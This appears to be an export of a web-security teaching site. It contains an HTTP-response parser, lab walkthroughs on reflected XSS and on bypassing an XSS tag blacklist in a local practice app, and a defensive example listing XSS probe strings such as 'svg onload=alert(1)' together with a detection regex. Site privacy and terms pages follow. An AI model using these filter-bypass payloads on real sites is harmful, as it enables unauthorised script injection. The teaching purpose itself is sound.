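To tie together the syntax, headers, chunked transfer encoding, and status codes covered above, here is a small parser for a raw HTTP/1.1 response. It is an added example for this tutorial, not code from the original article or from any tool shown in it; the sample response it embeds is constructed to mirror the netcat output above, with a made-up session id and body.

```python
"""Parse a raw HTTP/1.1 response: status line, headers, and a chunked body.

Added example for this tutorial; not code from the original article.
The sample response is constructed to mirror the netcat output shown above
(the session id and the HTML body are made up).
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Constructed sample: a keep-alive HTTP/1.1 response whose body arrives in
# two chunks (sizes 0xc = 12 and 0x13 = 19 bytes), ended by the zero-size chunk.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache-Coyote/1.1\r\n"
    b"Set-Cookie: JSESSIONID=EXAMPLE00000000000000000000000000; Path=/; HttpOnly\r\n"
    b"Content-Type: text/html;charset=ISO-8859-1\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Date: Wed, 27 Jul 2022 07:54:31 GMT\r\n"
    b"\r\n"
    b"c\r\n<html><body>\r\n"
    b"13\r\nHello</body></html>\r\n"
    b"0\r\n\r\n"
)


@dataclass
class HttpResponse:
    version: str
    status: int
    reason: str
    headers: dict[str, str] = field(default_factory=dict)  # names are lower-cased
    body: bytes = b""

    def header(self, name: str, default: str | None = None) -> str | None:
        return self.headers.get(name.lower(), default)

    def keeps_connection_open(self) -> bool:
        """HTTP/1.1 keeps the TCP connection open unless the server sends
        'Connection: close'; HTTP/1.0 closes unless it sends 'keep-alive'."""
        conn = (self.header("connection") or "").lower()
        if self.version == "HTTP/1.1":
            return conn != "close"
        return conn == "keep-alive"


def decode_chunked(data: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body.

    Each chunk is '<hex size>[;extensions]\\r\\n<size bytes>\\r\\n'; a size of 0
    terminates the body (any trailer headers after it are ignored here).
    """
    out = bytearray()
    pos = 0
    while True:
        line_end = data.find(b"\r\n", pos)
        if line_end < 0:
            raise ValueError("truncated chunk-size line")
        size_field = data[pos:line_end].split(b";", 1)[0].strip()
        if not size_field:
            raise ValueError("empty chunk-size line")
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:
            return bytes(out)
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk data")
        out += chunk
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def parse_response(raw: bytes) -> HttpResponse:
    """Split at the first empty line into headers and body, then frame the body
    by Transfer-Encoding, else Content-Length, else end-of-stream (HTTP/1.0 style)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no empty line separating headers from body")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)  # e.g. "HTTP/1.1 200 OK"
    if len(parts) < 2:
        raise ValueError(f"malformed status line: {lines[0]!r}")
    resp = HttpResponse(version=parts[0], status=int(parts[1]),
                        reason=parts[2] if len(parts) == 3 else "")
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        resp.headers[name.strip().lower()] = value.strip()

    if (resp.header("transfer-encoding") or "").lower() == "chunked":
        resp.body = decode_chunked(body)
    elif resp.header("content-length") is not None:
        length = int(resp.header("content-length"))
        if len(body) < length:
            raise ValueError("body shorter than Content-Length")
        resp.body = body[:length]
    else:
        resp.body = body  # body runs until the server closes the connection
    return resp


if __name__ == "__main__":
    r = parse_response(SAMPLE_RESPONSE)
    print(r.version, r.status, r.reason)
    print("chunked:", r.header("Transfer-Encoding"), "| keep-alive:", r.keeps_connection_open())
    print("decoded body:", r.body.decode("iso-8859-1"))
```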
503 is also returned during maintenance hours, during a migration, or when the server has crashed.\nConclusion # I hope this short tutorial has provided the foundations for understanding the HTTP protocol and its significance for application security. It’s a lot of information to digest and remember. You can use this as a reference to get started, and it is surely going to help us make better decisions while carrying out security assessments.\nI encourage you to continue exploring the HTTP RFCs (HTTP/1.1, HTTP/2, HTTP/3) for an in-depth understanding.\nRemember, learning web application security is an ongoing journey, and each step you take brings you closer to mastering this valuable skill.\nKeep exploring!\n","date":"26 July 2022","externalUrl":null,"permalink":"/http-basics-tutorial/","section":"Posts","summary":"","title":"HTTP Basics Tutorial","type":"posts"},{"content":" I have feedback on your post # Great! I am happy to take up any constructive feedback that can help improve the website and its content.\nYour content is misleading # Sometimes mistakes do happen, but don’t worry. Just let me know where things went wrong so I can fix it. Together we can make the website better!\nI would like to request a new topic? # You are most welcome to share any application security topic that you would like to learn more about.\n","date":"13 January 2022","externalUrl":null,"permalink":"/faqs/","section":"SecurityArray","summary":"","title":"FAQ's","type":"page"},{"content":"Welcome back to learning about the Cross-Site Scripting (XSS) vulnerability with the Kurukshetra app built by d4rk36.\nIn this article, we shall learn about reflected XSS and how it differs from stored XSS.\nBefore we start, ensure the lab is running; set up your lab first if you have not done so yet.\nTypes of Cross-Site-Scripting (XSS) # How Does Reflected XSS Work? 
# The server processes the malicious input supplied from the client side, and the same malicious code is injected into, and returned with, the HTTP response to the client without proper validation.\nThe browser renders the response content, assuming it was supplied by the application server, which it trusts, and so the injected malicious code gets executed as well.\nThe significant difference compared to stored cross-site scripting is that in reflected XSS the malicious code is just echoed back in the HTTP response and executed immediately. It is not stored anywhere in the database.\nFor the same reason, the impact of reflected XSS is reduced compared to the stored cross-site scripting vulnerability.\nPracticals - Reflected XSS # After setting up the lab, visit http://localhost:8066. The application should load as shown below; navigate to “XSS Challenge 2.”\nFigure 1: Kurukshetra XSS Challenge 2 Page\nBefore you start assessing, take some time to understand how the application functionality works.\nLet’s go ahead and give it a try with the same payload used in the stored XSS article.\nFigure 2: XSS Payload\nAfter entering the payload, click the “Submit” button, as shown in the screenshot below.\nFigure 3: XSS Payload Injection\nImmediately observe the alert pop-up message, which is displayed below.\nFigure 4: XSS Payload Alert Message\nClick “OK” and observe that the page loads normally.\nTo verify and confirm the vulnerability, right-click, select “view page source”, and search for the injected payload.\nFigure 5: XSS Payload HTML Code Verify\nThe proof-of-concept script aligns correctly with the HTML response received, and all the characters are displayed back exactly as given in the input field.\nYay!! 
Now we can confirm that we have successfully exploited the reflected XSS.\nA point to remember here is that, as the payload is not stored in the database, it gets executed only when the malicious code is injected. At all other times, the application behaves as expected.\nIn stored XSS, the malicious payload gets executed whenever any user visits the injected application functionality.\nSummary # This article covered how reflected XSS works and how to identify it, including reusing the same XSS payload without much tweaking.\nKeep learning!! :D\n","date":"4 January 2023","externalUrl":null,"permalink":"/challenge-2-reflected-cross-site-scripting-attack/","section":"Posts","summary":"","title":"Challenge 2 - Reflected cross-site scripting attack","type":"posts"},{"content":"Thanks to all the contributors!\nImages & Icons # Unsplash, Freepik, Flaticon ","date":"26 July 2022","externalUrl":null,"permalink":"/credits/","section":"SecurityArray","summary":"","title":"Credits and Thanks","type":"page"},{"content":"Welcome back to learning Cross-Site Scripting (XSS) with Kurukshetra, an app built by d4rk36.\nBefore we start, ensure the Kurukshetra lab is up and running; if you have not set up your lab yet, feel free to refer back to the link below.\nWe walked through stored and reflected XSS in the previous couple of articles. 
In today’s article, with those foundations in place, let’s dive into the practical labs and start learning.\nPracticals - Reflected XSS # After setting up the lab, visit http://localhost:8066 and ensure it’s accessible, then navigate to “XSS Challenge 3”.\nFigure 1: Kurukshetra XSS Challenge Page 3\nLet’s try it with the XSS payload used in our previous articles and observe how the application behaves.\nPayload Try 1: Classic # Figure 2: Classic XSS Payload\nOutput:\nFigure 3: Initial XSS Payload Result\nFrom the above observations, the application no longer shows a pop-up message; instead it prints out a partial string from our payload, which indicates that our XSS payload is no longer working.\nTo evaluate further, click “View page source” to understand how our injected payload string is placed in the HTML response body.\nI can see that the application has some kind of filter in place that removes the word “script,” which breaks the HTML syntax; the browser then treats the following data as plain text and displays the partial string.\nCan we assume that the vulnerability is fixed? No.\nThe developer leveraged a technique called “blacklisting” to protect the application from exploitation of the XSS vulnerability. However, this approach has limitations, and it can still be bypassed.\nTIP - 1 # HTML tag names are case-insensitive, which means we can try changing the payload to upper case, lower case, or even a mix of lower and upper case letters, as given below.\nPayload Try 2: Case-Insensitive # Output:\nFigure 4: Second XSS Payload Result\nIt looks like this technique also failed. 
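To see, from the defender's side, why a tag blacklist like this can never be the fix, here is an added example (not the Kurukshetra app's own code) that reconstructs two iterations of such a filter and compares them with contextual output encoding using Python's html.escape. The filter behaviour is an assumption modelled on what the challenge shows; the inputs are the probes this article series walks through, including the event-handler ones discussed in the tips that follow.

```python
"""Why a tag blacklist is not an XSS fix, compared with output encoding.

Added example; not the Kurukshetra app's own code. The two filters are
assumed reconstructions of the blacklisting the challenge exhibits, and
the inputs are the probes this article series walks through.
"""
from __future__ import annotations

import html
import re

# Constructed inputs: one benign value and the probes discussed in the series.
INPUTS = {
    "benign": "Raghu",
    "script": "<script>alert(1)</script>",
    "mixed_case": "<ScRiPt>alert(1)</ScRiPt>",
    "svg_onload": "<svg onload=alert(1)>",
    "body_onload": "<body onload=alert(1)>",
}


def blacklist_v1(value: str) -> str:
    """Assumed challenge-3 filter: drop the literal lower-case word 'script'."""
    return value.replace("script", "")


def blacklist_v2(value: str) -> str:
    """Assumed next iteration: drop several tag names, case-insensitively."""
    return re.sub(r"script|svg|img", "", value, flags=re.IGNORECASE)


def encode_for_html_body(value: str) -> str:
    """The actual fix for data rendered between HTML tags: escape the
    metacharacters so the browser shows them as text instead of parsing them."""
    return html.escape(value, quote=True)


# Reviewer-side check on the *rendered* output: is there still a script tag,
# or any tag carrying an on* event-handler attribute?
EXECUTABLE_MARKUP = re.compile(r"<\s*script\b|<[a-z][^>]*\son[a-z]+\s*=", re.IGNORECASE)


def still_executable(rendered: str) -> bool:
    """True if the rendered HTML still contains markup a browser would execute."""
    return EXECUTABLE_MARKUP.search(rendered) is not None


def evaluate(defence) -> dict[str, bool]:
    """For each input, does the page still contain executable markup after the defence?"""
    return {name: still_executable(defence(value)) for name, value in INPUTS.items()}


if __name__ == "__main__":
    for label, fn in [("blacklist_v1", blacklist_v1),
                      ("blacklist_v2", blacklist_v2),
                      ("html.escape", encode_for_html_body)]:
        print(label, evaluate(fn))
```

Each blacklist iteration leaves at least one probe executable, while encoding neutralises all of them because the fix works on the output context rather than on a list of known bad strings.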
The application seems to be filtering out both the lowercase and uppercase script tags that were inserted.\nTIP - 2 # JavaScript functions can be triggered for execution in many different ways; the HTML script tag is not the only option.\nOne way to execute the JavaScript “alert()” function is through the HTML SVG tag, which is generally used for embedding vector graphics in HTML pages.\nExample:\nThe HTML attribute “onload” is one of the event handler attributes used to control an element’s behavior.\nIn the above example, the HTML attribute “onload” is assigned the JavaScript function “alert()”, which runs immediately when the HTML SVG tag is loaded.\nLet’s go ahead and see this in action.\nPayload Try 3: HTML5 Tags # Output:\nThis attempt also failed, as the application filters out multiple HTML tag names, i.e., svg, script, img, etc.\nFrom the above example, we can see that the HTML attribute “onload” passes through without any filtering and is displayed back as keyed in.\nTIP - 3 # Not all HTML tag names can be blacklisted. Blocking some of them would break the entire HTML page and the application functionality.\nFor example, the HTML body tag is needed to load the page’s content, the HTML style tag is used to style the page, etc.\nWe shall adapt the previously used payload to the HTML body tag.\nPayload Try 4: HTML5 Tags # Output: pop-up message\nFigure 5: Fourth XSS Payload Alert\nyay!!! 
🎉 This time, our XSS payload worked, and the application displayed the pop-up message.\nTo confirm further, click “OK,” then right-click and select “View page source” to see how our payload was injected and aligned with the HTML response code.\nFigure 6: Fourth XSS Payload HTML Page Source\nYou should be able to see that our injected payload is correctly aligned with the markup and that the HTML onload event is triggered immediately; therefore it did indeed execute the JavaScript code.\nWith this, we have successfully solved XSS challenge 3.\nSummary # In this article, we learned how poorly implemented validations can still be bypassed by improving the payload and trying different possible combinations. The blacklisting approach is helpful as a quick fix but is not foolproof, and it must be updated whenever a new payload is reported. Additionally, we covered several tips and techniques that can help you improve your XSS identification skillset.\nKeep learning!! :D\n","date":"13 January 2023","externalUrl":null,"permalink":"/challenge-3-xss-bypass-blacklist-html-tags/","section":"Posts","summary":"","title":"Challenge 3 - XSS bypass blacklist HTML tags","type":"posts"},{"content":"Last Updated: 30th January 2026\nWho we are # SecurityArray is currently managed and maintained by Eracorp Technologies Private Limited. Our website address is: https://securityarray.net/.\n1. 
Introduction # SecurityArray, managed and owned by Eracorp Technologies Private Limited (“Portal” or “Company” or “We”), respects your privacy and is committed to protecting it through our compliance with this policy.\nThis policy describes how we collect, use, disclose, and protect the personal information of our customers and website users (“you”), describes the types of information we may collect from you or that you may provide when you visit the website securityarray.net (our “Website”), and our practices for collecting, using, maintaining, protecting, and disclosing that information.\nWe will only use your personal information in accordance with this policy unless otherwise required by applicable law. We take steps to ensure that the personal information that we collect about you is adequate, relevant, not excessive, and used for limited purposes.\nPrivacy laws in India generally define “personal information” as any information about an identifiable individual, which includes information that can be used on its own or with other information to identify, contact, or locate a single person. Personal information does not include business contact information, including your name, title, or business contact information.\nThis policy applies to information we collect, use, or disclose about our customers and Website users:\nOn this Website.\nIn email, text, and other electronic messages between you and this Website.\nWhen you interact with our advertising and applications on third-party websites and services if those applications or advertising include links to this policy.\nThe Website may include links to third-party websites, plug-ins, services, social networks, or applications. Clicking on those links or enabling those connections may allow the third party to collect or share data about you. 
If you follow a link to a third-party website or engage a third-party plugin, please note that these third parties have their own privacy policies and we do not accept any responsibility or liability for these policies. We do not control these third-party websites, and we encourage you to read the privacy policy of every website you visit.\nThis policy does not apply to information collected by:\nAny third party through any application or content (including advertising) that may link to or be accessible from the Website.\nPlease read this policy carefully to understand our policies and practices for collecting, processing, and storing your information. If you do not agree with our policies and practices, your choice is not to use our Website. By accessing or using this Website, you indicate that you understand, accept, and consent to the practices described in this policy. This policy may change from time to time (see CHANGES TO OUR PRIVACY POLICY). Your continued use of this Website after we make changes indicates that you accept and consent to those changes, so please check the policy periodically for updates.\n2. 
Information we collect about you # We collect and use several types of information from and about you, including:\nPersonal information that we can reasonably use to directly or indirectly identify you, such as your name, mailing address, e-mail address, telephone number, Internet protocol (IP) address used to connect your computer to the Internet, user name or other similar identifier, billing and account information, and any other identifier we may use to contact you online or offline (“personal information”).\nWe provide an opportunity for any user to unsubscribe or opt out of contact for marketing purposes on an ongoing basis by using the unsubscribe mechanism at the bottom of our emails, or by emailing hello@securityarray.net.\nNon-personal information that does not directly or indirectly reveal your identity or directly relate to an identified individual, such as demographic information, or statistical or aggregated information. Statistical or aggregated data does not directly identify a specific person, but we may derive non-personal statistical or aggregated data from personal information. 
For example, we may aggregate personal information to calculate the percentage of users accessing a specific Website feature.\nTechnical information, including your login information, browser type and version, time zone setting, browser plug-in types and versions, operating system and platform, or information about your internet connection, the equipment you use to access our Website, and usage details.\nNon-personal details about your Website interactions, including the full Uniform Resource Locators (URLs), clickstream to, through and from our Website (including date and time), products you viewed or searched for, page response times, download errors, length of visits to certain pages, page interaction information (such as scrolling, clicks, and mouse-overs), methods used to browse away from the page, or any phone number used to call our customer service number.\n3. How we collect information about you # We use different methods to collect your information, including through:\nDirect interactions with you when you provide it to us, for example, by filling in forms or corresponding with us by phone, email, or otherwise.\nUser contributions. You may also provide information for us to publish or display on public Website areas or transmit to other Website users or third parties.\nAutomated technologies or interactions, as you navigate through our Website. Information collected automatically may include usage details, IP addresses, and information collected through cookies, web beacons, and other tracking technologies.\nThrough our Company Affiliates\n4. Information you provide to us # The information we collect directly from you on or through our Website may include:\nInformation that you provide by filling in forms on our Website. This includes information provided at the time of registering to use our Website, subscribing to our service, posting material, and requesting further services. 
We may also ask you for information when you report a problem with our Website.\nRecords and copies of your correspondence (including email addresses), if you contact us.\nYour responses to surveys that we might ask you to complete for business research purposes.\nDetails of transactions you carry out through our Website and of the fulfillment of your orders. You may be required to provide financial information before placing an order through our Website.\nYour search queries on the Website.\nYou may also provide information to be published or displayed (hereinafter, “posted”) on public areas of the Website or transmitted to other users of the Website or third parties (such as our Facebook Group) (collectively, “User Contributions”). Your User Contributions are posted on and transmitted to others at your own risk. Please be aware that no security measures are perfect. Additionally, we cannot control the actions of other users of the Website with whom you may choose to share your User Contributions. Therefore, we cannot and do not guarantee that unauthorized persons will not view your User Contributions.\n5. 
Information we collect through cookies and other automatic data collection technologies # As you navigate through and interact with our Website, we may use cookies or other automatic data collection technologies to collect certain information about your equipment, browsing actions, and patterns, including:\nDetails of your visits to our Website, including traffic data, location data, logs, and other communication data and the resources that you access and use on the Website.\nInformation about your computer and internet connection, including your IP address, operating system, and browser type.\nWe may also use these technologies to collect information about your online activities over time and across third-party websites or other online services (behavioral tracking).\nThe information we collect automatically helps us to improve our Website and to deliver a better and more personalized service, including by enabling us to:\nEstimate our audience size and usage patterns.\nStore information about your preferences, allowing us to customize our Website according to your individual interests.\nSpeed up your searches.\nRecognize you when you return to our Website.\nThe technologies we use for this automatic data collection may include:\nCookies (or browser cookies). A cookie is a small file placed on the hard drive of your computer. You may refuse to accept browser cookies by activating the appropriate setting on your browser. However, if you select this setting you may be unable to access certain parts of our Website. Unless you have adjusted your browser setting so that it will refuse cookies, our system will issue cookies when you direct your browser to our Website.\nFlash Cookies. Certain features of our Website may use local stored objects (or Flash cookies) to collect and store information about your preferences and navigation to, from, and on our Website. Flash cookies are not managed by the same browser settings that are used for browser cookies. 
For information about managing your privacy and security settings for Flash cookies, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\nWeb Beacons. Pages of our Website and our emails may contain small electronic files known as web beacons (also referred to as clear gifs, pixel tags, and single-pixel gifs) that permit the Company, for example, to count users who have visited those pages or opened an email and for other related website statistics (for example, recording the popularity of certain website content and verifying system and server integrity).\n6. Third-party use of cookies and other tracking technologies # Some content or applications on the Website, including advertisements, are served by third parties, including advertisers, ad networks and servers, content providers, and application providers. These third parties may use cookies alone or in conjunction with web beacons or other tracking technologies to collect information about you when you use our Website. The information they collect may be associated with your personal information or they may collect information, including personal information, about your online activities over time and across different websites and other online services. They may use this information to provide you with interest-based (behavioural) advertising or other targeted content.\nWe do not control these third parties’ tracking technologies or how they are used. If you have any questions about an advertisement or other targeted content, you should contact the responsible provider directly. For more information about how you can opt out of receiving targeted advertising from many providers, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\n7. 
How we use your information # We use information that we collect about you or that you provide to us, including any personal information:\nTo present our Website and its contents to you.\nTo provide you with information, products, or services that you request from us.\nTo fulfill the purposes for which you provided the information or that were described when it was collected, or any other purpose for which you provide it.\nTo provide you with notices about your account, including expiration and renewal notices.\nTo carry out our obligations and enforce our rights arising from any contracts with you, including for billing and collection or to comply with legal requirements.\nTo notify you about changes to our Website or any products or services we offer or provide through it.\nTo improve our Website, products or services, marketing, or customer relationships and experiences.\nTo allow you to participate in interactive features, social media, or similar features on our Website or other websites.\nTo measure or understand the effectiveness of the advertising we serve to you and others, and to deliver relevant advertising to you.\nIn any other way we may describe when you provide the information. For any other purpose with your consent.\nWe may also use your information to contact you about our own services that may be of interest to you, as permitted by law. If you do not want us to use your information in this way, please use the unsubscribe mechanism at the bottom of our emails or email us at hello@securityarray.net. For more information, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\n8. 
Disclosure of your information # We may disclose personal information that we collect or you provide as described in this privacy policy:\nTo our subsidiaries and affiliates.\nIn accordance with applicable law, to a buyer or other successor in the event of a merger, divestiture, restructuring, reorganization, dissolution, or other sale or transfer of some or all of Eracorp Technologies Service assets, whether as a going concern or as part of bankruptcy, liquidation, or similar proceeding, in which personal information held by Eracorp Technologies Private Limited about our customers and users is among the assets transferred.\nTo contractors, developers, service providers, and other third parties we use to support our business (such as analytics and search engine providers that assist us with Website improvement and optimization) and who are contractually obligated to keep personal information confidential, use it only for the purposes for which we disclose it to them, and to process the personal information with the same standards set out in this policy.\nTo fulfill the purpose for which you provide it.\nFor any other purpose disclosed by us when you provide the information. With your consent.\nWe may also disclose your personal information:\nTo comply with any court order, law, or legal process, including to respond to any government or regulatory request, in accordance with applicable law.\nTo enforce or apply our terms of use and other agreements, including for billing and collection purposes.\nIf we believe disclosure is necessary or appropriate to protect the rights, property, or safety of Eracorp Technologies, our customers, or others. This includes exchanging information with other companies and organizations for the purposes of fraud protection.\n9. 
Transferring your personal information # We may transfer personal information that we collect or that you provide as described in this policy to contractors, service providers, and other third parties we use to support our business (such as analytics and search engine providers that assist us with Website improvement and optimization) and who are contractually obligated to keep personal information confidential, use it only for the purposes for which we disclose it to them, and to process the personal information with the same standards set out in this policy.\nWe may process, store, and transfer your personal information in and to a foreign country, with different privacy laws that may or may not be as comprehensive as Indian law. In these circumstances, the governments, courts, law enforcement, or regulatory agencies of that country may be able to obtain access to your personal information through the laws of the foreign country. Whenever we engage a service provider, we require that its privacy and security standards adhere to this policy and applicable Indian privacy law.\nBy submitting your personal information or engaging with the Website, you consent to this transfer, storage, or processing.\n10. Choices about how we use and disclose your information # We strive to provide you with choices regarding the personal information you provide to us. We have created mechanisms to provide you with the following control over your information:\nTracking Technologies and Advertising. You can set your browser to refuse all or some browser cookies, or to alert you when cookies are being sent. To learn how you can manage your Flash cookie settings, visit the Flash player settings page on Adobe’s website. If you disable or refuse cookies, please note that some parts of this Website may not be accessible or may not function properly. 
For more information about tracking technologies, see INFORMATION WE COLLECT THROUGH COOKIES AND OTHER AUTOMATIC DATA COLLECTION TECHNOLOGIES.\nPromotional Offers from the Company. If you have opted in to receive certain emails from us but no longer wish to have your contact information used by the Company to promote our own or third parties\u0026rsquo; products or services, you can opt-out by sending us an email stating your request to hello@securityarray.io. If we have sent you a promotional email, you may unsubscribe by clicking the unsubscribe link we have included in the email. This opt-out does not apply to information provided to the Company as part of a product purchase, warranty registration, product service experience, or other transactions.\nWe do not control third parties\u0026rsquo; collection or use of your information to serve interest-based advertising. However, these third parties may provide you with ways to choose not to have your information collected or used in this way. You can opt out of several third party ad servers\u0026rsquo; and networks\u0026rsquo; cookies simultaneously by using an opt-out tool created by the Network Advertising Initiative. You can also access these websites to learn more about online behavioural advertising and how to stop websites from placing cookies on your device. Opting out of a network does not mean you will no longer receive online advertising. It does mean that the network from which you opted out will no longer deliver ads tailored to your web preferences and usage patterns.\n11. Data security # The security of your personal information is very important to us. We use physical, electronic, and administrative measures designed to secure your personal information from accidental loss and from unauthorized access, use, alteration, and disclosure. We store all information you provide to us behind firewalls on our secure servers. We use third party payment services providers to process all payments. 
Your personal information may be processed in various international jurisdictions which do not have the same level of security as offered in India, or your home jurisdiction.\nThe safety and security of your information also depends on you. Where we have given you (or where you have chosen) a password for access to certain parts of our Website, you are responsible for keeping this password confidential. We ask you not to share your password with anyone.\nUnfortunately, the transmission of information via the Internet is not completely secure. Although we do our best to protect your personal information, we cannot guarantee the security of your personal information transmitted to our Website. Any transmission of personal information is at your own risk. We are not responsible for circumvention of any privacy settings or security measures contained on the Website.\n12. Data retention # Except as otherwise permitted or required by applicable law or regulation, we will only retain your personal information for as long as necessary to fulfill the purposes we collected it for, including for the purposes of satisfying any legal, accounting, or reporting requirements. Under some circumstances we may anonymize your personal information so that it can no longer be associated with you. We reserve the right to use such anonymous and de-identified data for any legitimate business purpose without further notice to you or your consent.\n13. Users under the age of 18 # Our Website is not intended for children under 18 years of age. No one under age 18 may provide any information to the Website. We do not knowingly collect personal information from children under 18. If we learn we have collected or received personal information from a child under 18 without verification of parental consent, we will delete that information. If you believe we might have any information from or about a child under 18, please contact us at hello@securityarray.net.\n14. 
Accessing and correcting your personal information # It is important that the personal information we hold about you is accurate and current. Please keep us informed if your personal information changes. By law you have the right to request access to and to correct the personal information that we hold about you.\nYou can review and change your personal information by logging into the website and visiting your account profile page.\nIf you want to review, verify, correct, or withdraw consent to the use of your personal information you may also send us an email at hello@securityarray.net to request access to, correct, or delete any personal information that you have provided to us. We may not accommodate a request to change information if we believe the change would violate any law or legal requirement or cause the information to be incorrect.\nWe may request specific information from you to help us confirm your identity and your right to access, and to provide you with the personal information that we hold about you or make your requested changes. Applicable law may allow or require us to refuse to provide you with access to some or all of the personal information that we hold about you, or we may have destroyed, erased, or made your personal information anonymous in accordance with our record retention obligations and practices. If we cannot provide you with access to your personal information, we will inform you of the reasons why, subject to any legal or regulatory restrictions.\nWe will provide access to your personal information, subject to exceptions set out in applicable privacy legislation. 
Examples of such exceptions include:\nInformation protected by solicitor-client privilege.\nInformation that is part of a formal dispute resolution process.\nInformation that is about another individual that would reveal their personal information or confidential commercial information.\nInformation that is prohibitively expensive to provide.\nIf you are concerned about our response or would like to correct the information provided, you may contact our Privacy Officer at hello@securityarray.net.\nProper access and use of information provided on the Website, including User Contributions, is governed by our terms of use, or any third-party policy if the contribution is made on another website.\n15. Withdrawing your consent # Where you have provided your consent to the collection, use, and transfer of your personal information, you may have the legal right to withdraw your consent under certain circumstances. To withdraw your consent, if applicable, contact us at hello@securityarray.io. Please note that if you withdraw your consent we may not be able to provide you with a particular product or service. We will explain the impact to you at the time to help you with your decision.\n16. Changes to our privacy policy # It is our policy to post any changes we make to our privacy policy on this page. If we make material changes to how we treat our users\u0026rsquo; personal information, we will notify you through a notice on the Website home page. We include the date the privacy policy was last revised at the top of the page. You are responsible for ensuring we have an up-to-date, active, and deliverable email address for you, and for periodically visiting our Website and this privacy policy to check for any changes.\n17. Contact Information and challenging compliance # We welcome your questions, comments, and requests regarding this privacy policy and our privacy practices. 
Please contact us at:\nAttn: Privacy Officer at hello@securityarray.net\nWe have procedures in place to receive and respond to complaints or inquiries about our handling of personal information, our compliance with this policy, and with applicable privacy laws. To discuss our compliance with this policy please contact our Privacy Officer using the contact information listed above.\n","date":"2 September 2021","externalUrl":null,"permalink":"/privacy/","section":"SecurityArray","summary":"","title":"Privacy","type":"page"},{"content":"Terms of Service (\u0026ldquo;Terms\u0026rdquo;)\nOur Terms of Service were last updated on 30th January 2026.\nPlease read these terms and conditions carefully before using Our Service.\nInterpretation and Definitions # Interpretation # The words in which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in the plural.\nDefinitions # For the purposes of these Terms of Service:\n\u0026ldquo;Account\u0026rdquo; means a unique account created for You to access our Service or parts of our Service.\n\u0026ldquo;Portal\u0026rdquo; (referred to as either \u0026ldquo;the Company\u0026rdquo;, \u0026ldquo;We\u0026rdquo;, \u0026ldquo;Us\u0026rdquo; or \u0026ldquo;Our\u0026rdquo; in this Agreement) refers to SecurityArray Portal.\n\u0026ldquo;Country\u0026rdquo; refers to India.\n\u0026ldquo;Content\u0026rdquo; refers to content such as text, images, or other information that can be posted, uploaded, linked to, or otherwise made available by You, regardless of the form of that content.\n\u0026ldquo;Device\u0026rdquo; means any device that can access the Service such as a computer, a cell phone, or a digital tablet.\n\u0026ldquo;Feedback\u0026rdquo; means feedback, innovations, or suggestions sent by You regarding the attributes, performance, or features of our Service.\n\u0026ldquo;Service\u0026rdquo; refers 
to the Website.\n\u0026ldquo;Terms of Service\u0026rdquo; (also referred to as \u0026ldquo;Terms\u0026rdquo;) mean these Terms of Service that form the entire agreement between You and the Company regarding the use of the Service.\n\u0026ldquo;Third-party Social Media Service\u0026rdquo; means any services or content (including data, information, products or services) provided by a third party that may be displayed, included, or made available by the Service.\n\u0026ldquo;Website\u0026rdquo; refers to SecurityArray, accessible from https://securityarray.net/\n\u0026ldquo;You\u0026rdquo; means the individual accessing or using the Service, or the company, or other legal entity on behalf of which such individual is accessing or using the Service, as applicable.\nAcknowledgment # These are the Terms of Service governing the use of this Service and the agreement that operates between You and the Company. These Terms of Service set out the rights and obligations of all users regarding the use of the Service.\nYour access to and use of the Service is conditioned on Your acceptance of and compliance with these Terms of Service. These Terms of Service apply to all visitors, users, and others who access or use the Service.\nBy accessing or using the Service You agree to be bound by these Terms of Service. If You disagree with any part of these Terms of Service then You may not access the Service.\nYou represent that you are over the age of 18. The Portal does not permit those under 18 to use the Service.\nYour access to and use of the Service is also conditioned on Your acceptance of and compliance with the Privacy Policy of the Portal. Our Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your personal information when You use the Application or the Website and tells You about Your privacy rights and how the law protects You. 
Please read Our Privacy Policy carefully before using Our Service.\nUser Accounts # When You create an account with Us, You must provide Us with information that is accurate, complete, and current at all times. Failure to do so constitutes a breach of the Terms, which may result in immediate termination of Your account on Our Service.\nYou are responsible for safeguarding the password that You use to access the Service and for any activities or actions under Your password, whether Your password is with Our Service or a Third-Party Social Media Service.\nYou agree not to disclose Your password to any third party. You must notify Us immediately upon becoming aware of any breach of security or unauthorized use of Your account.\nYou may not use as a username the name of another person or entity or that is not lawfully available for use, a name or trademark that is subject to any rights of another person or entity other than You without appropriate authorization, or a name that is otherwise offensive, vulgar or obscene.\nContent # Your Right to Post Content\nOur Service allows You to post Content. You are responsible for the Content that You post to the Service, including its legality, reliability, and appropriateness.\nBy posting Content to the Service, You grant Us the right and license to use, modify, publicly perform, publicly display, reproduce, and distribute such Content on and through the Service. You retain any and all of Your rights to any Content You submit, post, or display on or through the Service and You are responsible for protecting those rights. 
